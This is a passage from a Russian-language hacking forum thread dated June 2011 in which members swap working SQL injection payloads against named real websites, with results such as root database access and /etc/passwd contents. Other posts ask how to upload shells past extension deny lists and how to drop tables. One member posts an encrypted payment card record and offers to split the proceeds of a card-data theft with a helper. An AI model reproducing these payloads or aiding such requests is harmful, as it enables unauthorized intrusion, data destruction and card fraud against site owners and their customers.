PDA

Просмотр полной версии : Ваши вопросы по уязвимостям.


Страницы : 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 [70] 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98

kroŧ
10.06.2011, 15:04
Konqi спасибо, я так понял можно записать любой код, буду пробовать.

Вот ещё проблема

http://www.trommeslageren.dk/index2.php?id='0

ни могу подобрать поля

http://www.trommeslageren.dk/index2.php?id=-10+union+select+null,null..

ни чего не меняется

что тогда делать?

Konqi
10.06.2011, 15:14
http://www.trommeslageren.dk/index2.php?id=0'+and+0+union+select+1,2,3,4,5,6,7--+

kroŧ
10.06.2011, 15:23
если я пишу

+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--

выдаст 1 строку

возможно ли чтобы выдало все таблицы сразу ни по 1 строке?

Konqi
10.06.2011, 15:27
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?


group_concat() для mysql

тока на все таблицы, а в пределах 1024 символов

krot читайте мануалы, там вы найдете все ответы на вашы вопросы

---------

на этом сайте форум ипб, смотрите в сторону форума

XAMEHA
10.06.2011, 18:44
kroŧ said:
если я пишу
+UnIoN+AlL+sElEcT+TABLE_NAME+FROM+INFORMATION_SCHE MA.TABLES+LIMIT+0,1--
выдаст 1 строку
возможно ли чтобы выдало все таблицы сразу ни по 1 строке?


Можно и без огранечения в 1024 через IF или benchmark: /showpost.php?p=2298777&postcount=16 (https://antichat.live/showpost.php/p/2298777/postcount/16/)

KosoyRoman
10.06.2011, 19:51
d1v said:
какая версия?


3 станларт

FlaktW
10.06.2011, 21:38
Помогите определить БД, похоже на Postgres, но вывода не могу добиться

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+and+1=0+union+select+version()+--+

mailbrush
10.06.2011, 21:42
Может туплю, конечно, но в упор не вижу тут никакой инъекции...

FlaktW
10.06.2011, 21:44
mailbrush said:
Может туплю, конечно, но в упор не вижу тут никакой инъекции...


http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*1

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764*4

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1+--+

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=5764+union+select+1,2+--+

mailbrush
10.06.2011, 21:49
Туплю, туплю. Инъекция всё же есть. Но т.к. параметр page - то она, скорее всего, в операторе типа LIMIT, и через union её не получится раскрутить.

M_script
11.06.2011, 01:10
FlaktW said:
Помогите определить БД, похоже на Postgres, но вывода не могу добиться




Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version() ,user(),database())+--+

4.1.20:root@localhost:Site2


Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin

3aHyga
11.06.2011, 01:13
Здравствуйте. Я не так давно решил заняться sql injectionom, так вот у меня созрели два вопроса. Я провел sql inject узнал, узнал названние таблиц, и нужной мне ячейки, делаю такой запрос


Code:
www.сайт.com/index.php?id=-15+union+select+1,2,3,concat_ws(login,0x3a,passwor d),5,6+from+user+--+

Но логин и пароль на странице не поивился, и не выдала не какой ошибки, страница просто появилось. Version: 5.1.35.

Тоже самое я пробывал с другими таблицами, все было аналогично

Второй вопрос​Дайте пожалуйста сылку на faq! Как провести sql injection в mysql v4.***** я на форуме не увидел не одной нормальной статьи для версии 4.***** я конечно уверен что они тут есть но найти не как не могу. Зараннее огромное спасибо.

M_script
11.06.2011, 01:31
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"

Попробуй limit добавить.

2) SQL injection полный FAQ (https://antichat.live/threads/43966/)

3aHyga
11.06.2011, 01:41
M_script said:
1) Не "concat_ws(login,0x3a,password)", а "concat_ws(0x3a,login,password)" или "concat(login,0x3a,password)"
Попробуй limit добавить.


я вертел по всякому и с +limit+0,1 по разному пробывал! Но данные ячеек не появлялись! Может другие варианты есть?


Code:
SQL injection полный FAQ (/thread43966.html)

этот фак я читал, и как я понил он ближе к 5-тым версиям mysql

Seravin
11.06.2011, 01:41
может база не та

или unhex(hex())

3aHyga
11.06.2011, 01:46
Seravin said:
может база не та
или unhex(hex())


Можно по подробней? Точней пример запроса к бд

FlaktW
11.06.2011, 01:55
M_script said:

Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+concat_ws(0x3a,version() ,user(),database())+--+

4.1.20:root@localhost:Site2

Code:
http://www.avtogalaktika.ru/i.cgi?page=0+union+select+load_file('/etc/passwd')+--+

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin


Так вывод еще лучше:


http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+load_file('/etc/passwd')+--+

M_script
11.06.2011, 02:02
3aHyga, кинь ссылку сюда или в личку

3aHyga
11.06.2011, 02:10
M_script said:
3aHyga
, кинь ссылку сюда или в личку


Тут есть загвоздка! Я все делал на дедики и дедик в это время вырубился, я не знаю что там было может свет моргнул, или еще что данные сылки я утерял так как логи не сохранялись в мазиле а вспомнить не могу, а вобще это был какойто интернет магазин но не могу вспомнить сылку

вот могу еще один шоп дать там есть вывод на страницу и тд но не чего интересного там нету

_http://e-perfume.com.ar/verproducto.php?id=-180'

3aHyga
11.06.2011, 03:09
Только что нашол интернет магазин! в катором я на 100% уверен хроняться даные о картах, так как покупка проходит имено через этот магазин все данные вбиваются в него, на другие сайты не кидает, но там есть какойто прикол! Допустим я делаю запрос


Code:
www.сайт.com/index.php?id=15+union+select+1,@@version,3,4,5,6+--+

то сайт показывает информацыю о версии sql // - 5.0.51a-3ubuntu5

если же я делаю любой другой запрос меня перегидывает на главную страницу. Так как я еще совсем новечек и не знаю всех прелестей sql injecta кто согласится мне помоч или сам проведет sql inject конечно все 50 на 50 я согласен даже что вам 60% а мне 40 так как всю работу будите делать вы то отпишите в асю я дам данные сайта

icq 144-558-923

Melfis
11.06.2011, 03:40
Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает.

ps. а вообще что-то более конкретное советовать можно только увидев сайт.

3aHyga
11.06.2011, 03:53
Melfis said:
Либо ты делаешь неправильный запрос, либо наверняка обращаешься к information_schema и её таблицам, а на них может стоить фильтр. Попробуй выяснить в каком случае тебя перекидывает.


я делаю любой запрос меня перегидывает

когда я делаю такой запрос +union+select+1,@@version,2,3,4,5,6+--+

даны показываются остальные запросы не работают

Melfis
11.06.2011, 04:49
На сайте стоит фильтр на точку и скобки, на остальное не тестил.

KosoyRoman
11.06.2011, 04:51
Кто знает как залить шелл через CNStats STD 3.0

3aHyga
11.06.2011, 12:48
Подскажите пожалуйста. Чем расшифровывается вот этот код


Code:
01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB

winstrool
11.06.2011, 14:17
вроде масив HEX'a:

ki$Ì[Ñ^*/S:]½rÛ

3aHyga
11.06.2011, 14:22
winstrool said:
вроде масив HEX'a:
ki$Ì[Ñ^*/S:]½rÛ


я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах

вот болия полноя инфа


Code:
cc nameonca typeofcard id order_list_id expmm expyy total timeofcharge status purchaseid

01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB Keith Stewart Visa 68 69 1A:46:8B 11:F6:FB 55.98 1257444668 Waiting to charge PFP7153633

winstrool
11.06.2011, 15:18
3aHyga said:
я думаю не hex, так как расшифрованные данные должны быть исключительно в цифрах
вот болия полноя инфа

Code:
cc nameonca typeofcard id order_list_id expmm expyy total timeofcharge status purchaseid

01:6B:17:69:24:CC:5B:D1:5E:A0:2F:53:3A:5D:BD:72:DB Keith Stewart Visa 68 69 1A:46:8B 11:F6:FB 55.98 1257444668 Waiting to charge PFP7153633



если есть доступ к исходникам, то там можно посмотреть каким алгоритмом захешированные данные...

FlaktW
11.06.2011, 15:46
Объясните плиз, почему так вывод есть,

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=0+union+select+1+--+

а так нет?

http://www.avtogalaktika.ru/i.cgi?block=11838&ST=1&page=(0)union(select(1))+--+

foozzi
11.06.2011, 15:50
как вычислить на чем стоит локалка (ОСь)

MrGergez
11.06.2011, 20:04
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...

d1v
11.06.2011, 20:06
MrGergez said:
Почитал FAQ про использование инъекций для получения пользователя, но вот столкнулся с проблемой в таблицах ничего интересного, решил дропнуть таблицы, но вот в чем проблема как построить запрос на удаление таблиц? Нигде не нашел хотя бы примеров...


DROP TABLE "table_name"

только зачем!?

MrGergez
11.06.2011, 20:12
d1v said:
DROP TABLE "table_name"
только зачем!?


Тренировка и практика еще никому не мешали

d1v
11.06.2011, 20:13
MrGergez said:
Тренировка и практика еще никому не мешали


тренируйся на кошках (с)

MrGergez
11.06.2011, 20:15
Но если не трудно можете показать на примере вот здесь список таблиц

http://www.stromgren.com/products.php?id=22+and+1=0+union+select+group_conc at(table_name+separator+0x3a)+from+information_sch ema.tables+where+table_schema=0x73776173696e676572--

MrGergez
11.06.2011, 20:24
d1v said:
DROP TABLE "table_name"


А меня склоняло к мысли о TRUNCATE

SecondLife
12.06.2011, 00:05
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?

Интересует заливка шелла.

Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.

Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.

Есть доступ к phpinfo и некоторым файлам конфигурации.

Что можете подсказать?

FlaktW
12.06.2011, 00:10
SecondLife said:
Есть скрипт с отсутствием фильтрации в вызове функции readfile. С помощью этой уязвимости утянул исходники, но больше в них зацепиться не за что: нет инъекций, нет упоминаний админки (да и я не уверен, что она вообще существует), нет L/RFI, XSS, аворизации, системы прав, заливки файлов. Вообще ничего интересного кроме readfile. Можно ли вытянуть из этого что-то полезное?
Интересует заливка шелла.
Директивы open_basedir нет, однако (видимо из-за прав) получить файл httpd.conf не получилось.
Сайт лежит на VPS. Сайтов на сервере несколько, однако к одному IP привязан только один домен, так что через поиск сайтов по IP ничего узнать не вышло. Удалось установить наличие ещё одного сайта со своим собственным IP, однако и в его исходниках нет ничего интересного.
Есть доступ к phpinfo и некоторым файлам конфигурации.
Что можете подсказать?


Ты линк выложи, а мы посмотрим.

SecondLife
12.06.2011, 00:32
FlaktW said:
Ты линк выложи


Как-нибудь в другой раз. Здесь смотреть особо не на что, всю доступную инфу я озвучил, интересует направления, в которых думать дальше.

Unknown
12.06.2011, 11:53
delete

kroŧ
12.06.2011, 11:53
Подскажите любой рабочий способ узнать путь к файлу?

в чем тут ошибка?

?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1

?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\\'/tmp/lol.txt -- ORDER BY rel_id DESC LIMIT 5' at line 1

winstrool
12.06.2011, 12:01
kroŧ said:
Подскажите любой рабочий способ узнать путь к файлу?
в чем тут ошибка?
?id=-4256+union select+version()+into+outfile+0x2f746d702f6c6f6c2e 747874 --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '0x2f746d702f6c6f6c2e747874 -- ORDER BY rel_id DESC LIMIT 5' at line 1
?id=-4256+union select+version()+into+outfile+'/tmp/lol.txt' --
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to
use near '\\\'/tmp/lol.txt
-- ORDER BY rel_id DESC LIMIT 5' at line 1


у тебя экранируется кавычка, а для правильного вывода она не должна экранироваться, для получения пути к файлу попробуй поискать раскрытие путей, тойже самой подставкой [] к переменным.

-=Zhenek=-
12.06.2011, 14:39
подскажите..

Есть некая игра, и в ней есть флеш элемент.

Он представляет собой карту, по кторой ходишь и т.д Карта очень большая.

В коде страницы стоит ссылка не на сам элемент,а на лаудер, который грузит все остальное.. Но загрузившись 1 раз (4 метра) игра висит в кеше.

Можно ли как-то перехватить то, что лаудер грузит и получить всю карту целиком.. или как-то из кеша вытащить и разобрать флеш на код

Вытаскиваю из кеша полученные кусочки карты, но они в двоичном формате. Как его перевести в читабельный?

FlaktW
12.06.2011, 22:16
Как раскрутить эту скулю? У меня закончилась фантазия.

http://www.moy-teatr.ru/?place=53'

Konqi
12.06.2011, 23:29
FlaktW said:
Как раскрутить эту скулю? У меня закончилась фантазия.
http://www.moy-teatr.ru/?place=53'


мускул 3..

foozzi
13.06.2011, 00:43
есть сайт shock-world.com но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?

Да и еще, как откопать базу данных на которой стоит сайт?

o'clock
13.06.2011, 01:17
foozzi said:
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?


Host IP: 85.17.145.12

Web Server: nginx/0.8.34

Powered-by: PHP/5.2.13-pl0-gentoo

foozzi
13.06.2011, 02:47
o'clock said:
Host IP: 85.17.145.12
Web Server: nginx/0.8.34
Powered-by: PHP/5.2.13-pl0-gentoo


да это и я знаю, хотелось бы информации по моему запросу

Faaax
13.06.2011, 04:24
поищи соседей этого сайта,может к ним подойдёт пасс если у тебя уже всё есть

d1v
13.06.2011, 17:17
foozzi said:
есть сайт
shock-world.com
но вот никак не могу понять что за двигло, скорей всего самописное, но админку я тоже не могу найти, сканил всем чем можно, а новости они добавляют, то есть управление какое то есть, как мне вычислить не подскажете?
Да и еще, как откопать базу данных на которой стоит сайт?


Двиг - немного модифицированный Stress Web.

админка - admin.shock-world.com

БД - MySQL 5

Faaax
13.06.2011, 17:32
нужна помосчь

вот есть такой запрос


Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION %28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x356664 6B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C 21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C 31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C 41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C 51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C 61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C 71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C 81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C 91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2 C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C1 09%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117 %2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2 C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C1 34%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142 %2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2 C151%20%23

он выводит и имя бд и имя юзера

но при дальнейшей крутке

не выводит имена таблиц при таком запросе


Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CTABLE_S CHEMA%2CTABLE_NAME%29%29%2C0x3566646B68%29%2C13%2C 14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C 24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C 34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C 44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C 54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C 64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C 74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C 84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C 94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C10 3%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111% 2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C 120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C12 8%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136% 2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C 145%2C146%2C147%2C148%2C149%2C150%2C151%20FROM%20i nformation_schema.tables%20WHERE%20TABLE_SCHEMA%3C %3E0x696e666f726d6174696f6e5f736368656d61%20%23

может кто посодействовать?

GIG
14.06.2011, 06:32
Не работал практически с Oracle , да и еще походу full blind имею. полез смотреть что сегодня в моде из автоматики , нашел sqlmap , поковырявшись выставил --level=5 и --risk=3 . В итоге что с дефолтными настройками что так , линковые параметры он считает не уязвимыми . Хотя со мной солидарны несколько утилит типа Acunetix . На выводе при подстановке банальной кавычки получаю :


ORA-06502: PL/SQL: : ошибка преобразования символа в число ошибка числа или значения ORA-06512: на "имя_таблицы или колонки", line 2271 ORA-06512: на "имя_таблицы или колонки", line 1280


Собстно чем еще попробовать можно ?

kroŧ
14.06.2011, 15:18
Как называется это уязвимость, пример:

http://www.rcnz.org.nz/email.php?e=

скажите пожалуйста, как это можно использовать?

foozzi
14.06.2011, 15:26
kroŧ said:
Как называется это уязвимость, пример:
http://www.rcnz.org.nz/email.php?e=
скажите пожалуйста, как это можно использовать?


там фильтрация <>

там вроде нет ничего

http://www.rcnz.org.nz/about/church-edit-password.php

мб поможет, я хз

да и вот еще http://www.rcnz.org.nz/search.php?query='

пишет Loading но ничего не выводит, остальное фильтрирует

Seravin
14.06.2011, 15:39
Faaax said:
нужна помосчь
вот есть такой запрос

Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CVERSION %28%29%2CDATABASE%28%29%2CUSER%28%29%29%2C0x356664 6B68%29%2C13%2C14%2C15%2C16%2C17%2C18%2C19%2C20%2C 21%2C22%2C23%2C24%2C25%2C26%2C27%2C28%2C29%2C30%2C 31%2C32%2C33%2C34%2C35%2C36%2C37%2C38%2C39%2C40%2C 41%2C42%2C43%2C44%2C45%2C46%2C47%2C48%2C49%2C50%2C 51%2C52%2C53%2C54%2C55%2C56%2C57%2C58%2C59%2C60%2C 61%2C62%2C63%2C64%2C65%2C66%2C67%2C68%2C69%2C70%2C 71%2C72%2C73%2C74%2C75%2C76%2C77%2C78%2C79%2C80%2C 81%2C82%2C83%2C84%2C85%2C86%2C87%2C88%2C89%2C90%2C 91%2C92%2C93%2C94%2C95%2C96%2C97%2C98%2C99%2C100%2 C101%2C102%2C103%2C104%2C105%2C106%2C107%2C108%2C1 09%2C110%2C111%2C112%2C113%2C114%2C115%2C116%2C117 %2C118%2C119%2C120%2C121%2C122%2C123%2C124%2C125%2 C126%2C127%2C128%2C129%2C130%2C131%2C132%2C133%2C1 34%2C135%2C136%2C137%2C138%2C139%2C140%2C141%2C142 %2C143%2C144%2C145%2C146%2C147%2C148%2C149%2C150%2 C151%20%23

он выводит и имя бд и имя юзера
но при дальнейшей крутке
не выводит имена таблиц при таком запросе

Code:
bc_tovar_id=2%20%26%26%201%3D2%20UNION%20SELECT%20 1%2C2%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2CCONC AT%280x6467797436%2CCONCAT_WS%280x203A20%2CTABLE_S CHEMA%2CTABLE_NAME%29%29%2C0x3566646B68%29%2C13%2C 14%2C15%2C16%2C17%2C18%2C19%2C20%2C21%2C22%2C23%2C 24%2C25%2C26%2C27%2C28%2C29%2C30%2C31%2C32%2C33%2C 34%2C35%2C36%2C37%2C38%2C39%2C40%2C41%2C42%2C43%2C 44%2C45%2C46%2C47%2C48%2C49%2C50%2C51%2C52%2C53%2C 54%2C55%2C56%2C57%2C58%2C59%2C60%2C61%2C62%2C63%2C 64%2C65%2C66%2C67%2C68%2C69%2C70%2C71%2C72%2C73%2C 74%2C75%2C76%2C77%2C78%2C79%2C80%2C81%2C82%2C83%2C 84%2C85%2C86%2C87%2C88%2C89%2C90%2C91%2C92%2C93%2C 94%2C95%2C96%2C97%2C98%2C99%2C100%2C101%2C102%2C10 3%2C104%2C105%2C106%2C107%2C108%2C109%2C110%2C111% 2C112%2C113%2C114%2C115%2C116%2C117%2C118%2C119%2C 120%2C121%2C122%2C123%2C124%2C125%2C126%2C127%2C12 8%2C129%2C130%2C131%2C132%2C133%2C134%2C135%2C136% 2C137%2C138%2C139%2C140%2C141%2C142%2C143%2C144%2C 145%2C146%2C147%2C148%2C149%2C150%2C151%20FROM%20i nformation_schema.tables%20WHERE%20TABLE_SCHEMA%3C %3E0x696e666f726d6174696f6e5f736368656d61%20%23

может кто посодействовать?


url decode сделал хотя бы...

а вообще предположу что надо либо group_concat либо limit использовать

foozzi
14.06.2011, 15:47
так выводит http://exange.shock-world.com/?page=19&id=6&clan_id=268558626

так неводит http://exange.shock-world.com/?page='19&id=6&clan_id=antichat

то есть пустая страница

скажите есть ченить тут?

zlo12
14.06.2011, 15:53
foozzi said:
так выводит http://exange.shock-world.com/?page=19&id=6&clan_id=268558626
так неводит http://exange.shock-world.com/?page=
'
19&id=6&clan_id=
antichat
то есть пустая страница
скажите есть ченить тут?


нет там ничего.

каждые каникулы возникают вопросы по взлому линейки

foozzi
14.06.2011, 15:54
zlo12 said:
нет там ничего.
каждые каникулы возникают вопросы по взлому линейки


хм... причем тут взлом "линейки"? бд этого сервера стоит оочень не мало, и она уже сливалась в 2007 году

qaz
14.06.2011, 17:22
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692

FlaktW
14.06.2011, 21:29
В чем причина?

Так выводится:

http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23

Duplicate entry '5.1.41-log1' for key 'group_key'

а, так нет:

http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23

foozzi
14.06.2011, 21:34
qaz said:
Подскажите плыз как разкрутить подобную скулю http://uzmob.uz/profile.php?mode=viewprofile&u=692


сам не смог ничего сделать, пробовалв sqlhelper'e он тоже ничего не сделал кроме того что определил что это sql union inj

И у меня есть пару вопросов

есть сайт, просканил директории нашол файл .bash_history

открыл его там такое:


Code:
crontab -e
svs@a18-swforum ~ $ crontab -e
crontabs/svs: Permission denied
ls -la
ps aux
ps aux
ps aux
ps aux
ps aux
crontab -e
man crontab
exit

что это? И если на сайте отображается код JS ну например открываю ссылку site.com/pngfix.js оно мне выдает код скрипта, это нормально?

и последнее:

перебираю страницы на сайте и наткнулся на такое:

http://site.com/?id=7 страница выдала


Code:
can't select db: Could not locate entry in sysdatabases for database 'название базы'. No entry found with that name. Make sure that the name is entered correctly.

сканил сайт сканером WVS он выдал что здесь http://forum.shock-world.com/journal.php?"onmouseover=prompt(987671)>

XSS но я в них мало шарю, что с нее выжать можно?

вобщем есть за что хвататься?

freezed
15.06.2011, 07:23
FlaktW said:
В чем причина?
Так выводится:
http://www.liftnn.ru/page.php?path=0.25)+or+(SeLect+count(*)+from+(sele ct+1+UnIoN+select+2+UnIoN+select+3)x%20+group+by+c oncat(version(),floor(rand(0)*2)))%23
Duplicate entry '5.1.41-log1' for key 'group_key'
а, так нет:
http://www.liftnn.ru/page.php?path=0.25)+or+1+group+by+concat((select+/*!table_name*/+/*!from*/+/*!information_schema*/./*!tables*/+/*!limit*/+0,1),floor(rand(0)*2))/*!having*/+count(*)+or+1%23


http://www.liftnn.ru/page.php?path=0.25

там точка используется для разбиения переданного параметра, поэтому второй запрос и не работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+pages+limit+0,1),floor(rand(0)*2))having+min( 0)+or+1%23 работает

http://www.liftnn.ru/page.php?path=3)+or+1+group+by+concat((select+123+ from+sttsnn_lift2.pages+limit+0,1),floor(rand(0)*2 ))having+min(0)+or+1%23 не работает, т.к. точкой разбили запрос

бруть таблицы либо ищи способ обойтись без точки

Optik-Crack
15.06.2011, 12:40
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.

ubi
15.06.2011, 12:47
Optik-Crack said:
Бывают 2 вида скуль инъекции это обычные и слепые, но все они находятся по разному, киньте ссылки на статьи к способам их нахождения.



SQL injection полный FAQ [Dr.Z3r0] (https://antichat.live/threads/43966/)

SQL инъекция (в т.ч. и blind SQL) [kot777] (https://antichat.live/threads/19844/)

Быстрый Blind SQL Injection [Qwazar] (http://forum.antichat.su/threadnav119047-1-10.html)

А поиск для чего??

Faaax
15.06.2011, 17:59
Seravin said:
url decode сделал хотя бы...
а вообще предположу что надо либо group_concat либо limit использовать


пробовал group_concat либо limit не выводит ничего

freezed
15.06.2011, 22:31
есть уязвимый сервер, могу заливать все типы файлов кроме:

$Config['DeniedExtensions']['File'] = array('php','asp','aspx','ascx','jsp','cfm','cfc', 'pl','bat','exe','dll','reg') ;

пробовал php3, phtml, xinc, различные комбинации по типу php.jpg, не выполняются, а скачиваются

сервер под nginx, поэтому htaccess не пойдет

lfi не нашел

что можно еще поробовать?

vaddd
15.06.2011, 23:01
кусок уязвимого кода


";
echo $row["username"];
echo "";
echo $row["visits"];
echo "";
}
echo "";
?>


структура таблицы


CREATE TABLE `tb_users` (
`id` int(11) NOT NULL auto_increment,
`username` varchar(15) NOT NULL,
`password` varchar(100) NOT NULL,
`ip` varchar(15) NOT NULL,
`email` varchar(150) NOT NULL,
`pemail` varchar(150) NOT NULL,
`referer` varchar(15) NOT NULL,
`country` varchar(150) NOT NULL,
`visits` varchar(150) NOT NULL default '0',
`referals` varchar(150) NOT NULL default '0',
`referalvisits` varchar(150) NOT NULL default '0',
`money` varchar(150) NOT NULL default '0.00',
`paid` varchar(150) NOT NULL default '0.00',
`joindate` varchar(150) NOT NULL,
`lastlogdate` varchar(150) NOT NULL,
`lastiplog` varchar(150) NOT NULL,
`account` varchar(150) NOT NULL,
`user_status` varchar(15) NOT NULL default 'user',
KEY `id` (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=20 ;


чему должна быть равна переменная $lole для вывода password where username admin?

Unknown
15.06.2011, 23:18
vaddd said:
кусок уязвимого кода
структура таблицы
чему должна быть равна переменная $lole для вывода password where username admin?


Должно быть mq = off;

Попробуй

Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1

Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).

vaddd
15.06.2011, 23:24
Фараон said:
Должно быть mq = off;
Попробуй
Cookie: UsNick = ' union select 1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8 from tb_users where username='admin'-- 1
Скинь ссылку в пм. Догадываюсь что за движок (bux какой-то).


inurl:advertisewmz.php

уязвимый сценарий referals.php, он в той же папке

спасибо за ответ, попробую завтра

принтабельные цифры будут 2,9?

ubi
15.06.2011, 23:26
freezed said:
